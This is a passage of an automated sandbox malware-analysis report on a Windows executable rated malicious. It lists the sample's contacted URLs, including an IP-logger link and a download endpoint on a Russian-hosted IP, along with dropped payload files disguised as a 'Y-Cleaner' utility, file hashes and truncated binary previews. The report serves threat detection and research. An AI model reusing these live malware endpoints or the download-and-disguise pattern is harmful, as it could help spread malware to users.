https://iplogger.org/1Pz8p7	7JKssbjRDa.exe, 00000000.00000003.2942345955.000000000585D000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2943755516.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2944183260.000000000595F000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2944399223.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2942345955.000000000595B000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2942066363.0000000005647000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2943967641.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, 7JKssbjRDa.exe, 00000000.00000003.2942621168.000000000595F000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr	false		high
http://185.156.73.23/add?substr=mixtwo&s=three&sub=empK	7JKssbjRDa.exe, 00000000.00000002.3033624379.0000000005580000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.156.73.23	unknown	Russian Federation		48817	RELDAS-NETRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578905
Start date and time:	2024-12-20 16:30:53 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	7JKssbjRDa.exe renamed because original name is a hash value
Original Sample Name:	838f2a05f5d5d176ef23390b574df27e.exe
Detection:	MAL
Classification:	mal100.evad.winEXE@2/15@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21, 13.107.246.63, 172.202.163.200, 20.190.177.82
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:32:28	API Interceptor	539463x Sleep call for process: 7JKssbjRDa.exe modified
10:33:16	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.156.73.23	dI3n4LSHB7.exe	Get hash	malicious	Unknown	Browse	185.156.73.23/soft/download
	zmTSHkabY6.exe	Get hash	malicious	Unknown	Browse	185.156.73.23/soft/download
	8V0INSl0E2.exe	Get hash	malicious	Unknown	Browse	185.156.73.23/soft/download
	BEd2lJRXFM.exe	Get hash	malicious	Unknown	Browse	185.156.73.23/soft/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0035.t-0009.t-msedge.net	16ebsersuX.exe	Get hash	malicious	Cryptbot	Browse	13.107.246.63
	Qmg24kMXxU.exe	Get hash	malicious	LummaC, Stealc	Browse	13.107.246.63
	f48jWpQ2F8.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	MS100384UTC.xls	Get hash	malicious	Unknown	Browse	13.107.246.63
	RZnZbS97dD.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	Invoice Shipment.bat.exe	Get hash	malicious	DarkCloud	Browse	13.107.246.63
	MS100384UTC.xls	Get hash	malicious	Unknown	Browse	13.107.246.63
	SWIFT.xls	Get hash	malicious	Unknown	Browse	13.107.246.63
	Invoice for 04-09-24 fede39.admr.org.html	Get hash	malicious	Unknown	Browse	13.107.246.63
	https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2Fpayment	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RELDAS-NETRU	dI3n4LSHB7.exe	Get hash	malicious	Unknown	Browse	185.156.73.23
	zmTSHkabY6.exe	Get hash	malicious	Unknown	Browse	185.156.73.23
	8V0INSl0E2.exe	Get hash	malicious	Unknown	Browse	185.156.73.23
	BEd2lJRXFM.exe	Get hash	malicious	Unknown	Browse	185.156.73.23
	beacon.exe	Get hash	malicious	CobaltStrike	Browse	185.156.73.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1]	dI3n4LSHB7.exe	Get hash	malicious	Unknown	Browse
	8V0INSl0E2.exe	Get hash	malicious	Unknown	Browse
	BEd2lJRXFM.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_7JKssbjRDa.exe_1142d0f432b383afe835c5f99e42dbc2b73eb_2031bbcc_a92f9336-0016-43b0-93b9-e66825d826bd\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9862430196578886
Encrypted:	false
SSDEEP:	96:3ppSuTwuBVAsEhNO7YjSYQXIDcQxc69cEkcw39J+HbHg/8BRTf3Oy1oVazW0H9nr:ZLTHVAQ0P5upejud3szuiFFZ24IO8O
MD5:	99F6CC892F9DB19081BD504A96486BB4
SHA1:	9949BDA7820069A81C437C4191DA48BE4E4D782B
SHA-256:	61B5E1F9CA9A156986ADB5EADB58F0B7C03883EE27FEEEEA8A0BF789F0577121
SHA-512:	87EC4429BA59BB04224A5DE0622B35459D99369D24077202441EF71A4E16907C55EB6C827580642E718B06032E91853A18979DBC7CBA92AC3C6964442EA72469
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.1.8.2.3.9.1.2.1.9.0.8.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.1.8.2.3.9.1.6.8.7.8.3.3.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.9.2.f.9.3.3.6.-.0.0.1.6.-.4.3.b.0.-.9.3.b.9.-.e.6.6.8.2.5.d.8.2.6.b.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.a.8.5.f.6.9.0.-.f.8.3.6.-.4.c.f.d.-.a.a.f.0.-.b.e.e.1.e.6.5.b.9.8.1.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.7.J.K.s.s.b.j.R.D.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.7.4.-.0.0.0.1.-.0.0.1.5.-.3.9.8.d.-.4.4.4.e.f.4.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.0.7.8.b.5.7.7.6.2.5.8.f.6.a.c.5.a.d.1.d.c.8.e.8.c.4.0.0.0.7.1.0.0.0.0.f.f.f.f.!.0.0.0.0.0.5.f.4.d.7.3.d.6.0.6.7.8.a.9.5.7.d.7.0.7.a.5.0.b.9.e.2.b.a.6.0.2.d.f.2.5.1.a.4.!.7.J.K.s.s.b.j.R.D.a...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF9C4.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Dec 20 15:33:11 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	47018
Entropy (8bit):	2.5482694442811287
Encrypted:	false
SSDEEP:	384:7Mp8I/BihP+HoPnAC1XWudxQsP6MF5/3u0m30/N:7MuI/BihP+AnAC1mCxQ+6U+wN
MD5:	76670D9D8BC2338A459B1773AB04C82F
SHA1:	EF3C7596F2A266230C17DB35D61A5748C0FCCCAE
SHA-256:	69C2B3DEF0C4F50E2465EE098DCB9F72155F250ABEEE319FAB9510EE733ED809
SHA-512:	AE43DD4F7AA6A89DE0FF0CF40BFB110A229616E9838FC64D9A3FD933E965D8372B85BF8296E3B11D3E2997C997457041B8818DC57384060B6D3406CDCA291675
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......7.eg............4...........8...<.......D....,..........T.......8...........T............C...t..........t...........` ..............................................................................eJ....... ......GenuineIntel............T.......t....eg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFAA0.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8394
Entropy (8bit):	3.7007508558820845
Encrypted:	false
SSDEEP:	192:R6l7wVeJ6x6iMRe6Y2DISU9YgmfiVZ0pDr89bL9sf0i5m:R6lXJE6O6YFSU9Ygmfi71L2fc
MD5:	C5746F7CBF67E9C36770DC8F71C657B1
SHA1:	E17A4BECF9E374D920F165FF8BFBB37C7A20677A
SHA-256:	4E7D1E824EF19D7F7C8C49EEE1F0255CEF1084B8AA682D7ECBAFF95E21A8E009
SHA-512:	FB028F278504BB82A25C30C032377636CCB119DBD3C3B7B41A37B690AB015F54A37711F5D31891166568ED3EE37B144C8D5CE1AB09A347392560667AAF362742
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.6.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFAE0.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4680
Entropy (8bit):	4.458339642539779
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI9mxWpW8VYLYm8M4JQiFi+q8vmGv6KzD3d:uIjfNI7Eg7V3JQKFyKzD3d
MD5:	57271EE51B0F2CC18497EF4B9C914EBB
SHA1:	ACF42D437F5FA2E992FFCFB1F69C62BDE628B4A1
SHA-256:	E45C74CCB7EA1CF0064512796A2A08AB066E192EEAAE432C50EA9C48052F3CF6
SHA-512:	378690D264E6622156B31AAD7DD78B75D47E80CC2D1368277CE8185904146EFE578F16C330C051BDF08CA84064DBB12EB5EE32E34D0907BC47C600677D60B11A
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="639755" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\fuckingdllENCR[1].dll

Process:	C:\Users\user\Desktop\7JKssbjRDa.exe
File Type:	data
Category:	dropped
Size (bytes):	97296
Entropy (8bit):	7.9982317718947025
Encrypted:	true
SSDEEP:	1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
MD5:	E6743949BBF24B39B25399CD7C5D3A2E
SHA1:	DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
SHA-256:	A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
SHA-512:	3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~\|..j...b..K!..N.7R.}T.2bsq..1...L^..!.\|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO\|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\add[1].htm

Process:	C:\Users\user\Desktop\7JKssbjRDa.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1]

Process:	C:\Users\user\Desktop\7JKssbjRDa.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	242176
Entropy (8bit):	6.47050397947197
Encrypted:	false
SSDEEP:	6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
MD5:	2ECB51AB00C5F340380ECF849291DBCF
SHA1:	1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
SHA-256:	F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
SHA-512:	E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: dI3n4LSHB7.exe, Detection: malicious, Browse Filename: 8V0INSl0E2.exe, Detection: malicious, Browse Filename: BEd2lJRXFM.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....:..s.....(...........2r...p(;...&Vr...p.....r...p.......(....>.........}.......(C.....o...(D...(E...}.....(F...(E...(G...&>.........}.......(C.....o...(D...}.....(F...(E...(H...&".......>.........}....R..} .....{ ...oo.....{ ..."..}!.....{!......}.....{#....{....op....{....,...{ ...oo.....{!...oo.....{....B.....su...(v.....{#....{#...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\download[1].htm

Process:	C:\Users\user\Desktop\7JKssbjRDa.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\key[1].htm

Process:	C:\Users\user\Desktop\7JKssbjRDa.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	21
Entropy (8bit):	3.880179922675737
Encrypted:	false
SSDEEP:	3:gFsR0GOWW:gyRhI
MD5:	408E94319D97609B8E768415873D5A14
SHA1:	E1F56DE347505607893A0A1442B6F3659BEF79C4
SHA-256:	E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
SHA-512:	994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
Malicious:	false
Preview:	9tKiK3bsYm4fMuK47Pk3s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\soft[1]

Process:	C:\Users\user\Desktop\7JKssbjRDa.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1502720
Entropy (8bit):	7.646111739368707
Encrypted:	false
SSDEEP:	24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
MD5:	A8CF5621811F7FAC55CFE8CB3FA6B9F6
SHA1:	121356839E8138A03141F5F5856936A85BD2A474
SHA-256:	614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
SHA-512:	4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(......(.....~....-.r...p.....(....o....s.........~.....~...........j(....r=..p~....o....t....j(....rM..p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t.....~......(....Vs....(....t.........N.(.....(.....(........0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\download[1].htm

Process:	C:\Users\user\Desktop\7JKssbjRDa.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Temp\7WudVZeKwZEdsuzzf2sS\Bunifu_UI_v1.5.3.dll

Process:	C:\Users\user\Desktop\7JKssbjRDa.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	242176
Entropy (8bit):	6.47050397947197
Encrypted:	false
SSDEEP:	6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
MD5:	2ECB51AB00C5F340380ECF849291DBCF
SHA1:	1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
SHA-256:	F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
SHA-512:	E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....:..s.....(...........2r...p(;...&Vr...p.....r...p.......(....>.........}.......(C.....o...(D...(E...}.....(F...(E...(G...&>.........}.......(C.....o...(D...}.....(F...(E...(H...&".......>.........}....R..} .....{ ...oo.....{ ..."..}!.....{!......}.....{#....{....op....{....,...{ ...oo.....{!...oo.....{....B.....su...(v.....{#....{#...

C:\Users\user\AppData\Local\Temp\7WudVZeKwZEdsuzzf2sS\Y-Cleaner.exe

Process:	C:\Users\user\Desktop\7JKssbjRDa.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1502720
Entropy (8bit):	7.646111739368707
Encrypted:	false
SSDEEP:	24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
MD5:	A8CF5621811F7FAC55CFE8CB3FA6B9F6
SHA1:	121356839E8138A03141F5F5856936A85BD2A474
SHA-256:	614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
SHA-512:	4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(......(.....~....-.r...p.....(....o....s.........~.....~...........j(....r=..p~....o....t....j(....rM..p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t.....~......(....Vs....(....t.........N.(.....(.....(........0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

C:\Users\user\Desktop\Cleaner.lnk

Process:	C:\Users\user\Desktop\7JKssbjRDa.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Fri Dec 20 14:33:10 2024, mtime=Fri Dec 20 14:33:10 2024, atime=Fri Dec 20 14:33:10 2024, length=1502720, window=hide
Category:	dropped
Size (bytes):	2186
Entropy (8bit):	3.891790620929987
Encrypted:	false
SSDEEP:	24:8WKCiNDQlXjX3RWgKgI3SPYtAeOEaQivNC646vO4ZQkq6mBPqygm:8pC6DQlznR1I3XmXJvNCDKZhqIyg
MD5:	DC7E4528C87BF20E2855331B576269ED
SHA1:	CA847E5DE2A44B87F21F37568905A27F6771685D
SHA-256:	F61145DAA7F972C8185BB01B7217985A84C9FEC442260EC3FF0C9383C9B9E694
SHA-512:	8B900E65CED65E348155F9FBCF0987C1A3BF7C80251D907FA0E06022E2855BD17E51E20ACFCE888CEB39571075A9B5AA0B70B948B6EB473E315BA8A0B17FA59E
Malicious:	false
Preview:	L..................F.@.. ....@.y.R...@.y.R...@.y.R..........................6.:..DG..Yr?.D..U..k0.&...&.......$..S....`.I.R..:,.y.R......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.{...........................^.A.p.p.D.a.t.a...B.P.1......Y.{..Local.<......EW<2.Y.{....[.....................}.).L.o.c.a.l.....N.1......Y.{..Temp..:......EW<2.Y.{....^........................T.e.m.p.....r.1......Y"\|..7WUDVZ~1..Z......Y"\|.Y"\|..............................7.W.u.d.V.Z.e.K.w.Z.E.d.s.u.z.z.f.2.s.S.....h.2......Y&\| .Y-CLEA~1.EXE..L......Y&\|.Y&\|....<.....................U+..Y.-.C.l.e.a.n.e.r...e.x.e.......v...............-.......u............w......C:\Users\user\AppData\Local\Temp\7WudVZeKwZEdsuzzf2sS\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. 